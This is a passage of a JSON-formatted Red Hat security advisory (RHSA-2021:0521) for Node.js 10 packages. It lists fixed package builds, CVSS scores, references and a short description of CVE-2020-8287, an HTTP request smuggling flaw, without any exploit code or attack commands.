"7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: use-after-free in the TLS implementation" }, { "cve": "CVE-2020-8287", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912863" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. Affected versions of Node.js allow two copies of a header field in an HTTP request. The first header field is recognized while the second is ignored leading to HTTP request smuggling. The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling via two copies of a header field in an http request", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8287" }, { "category": "external", "summary": "RHBZ#1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8287", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8287" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", 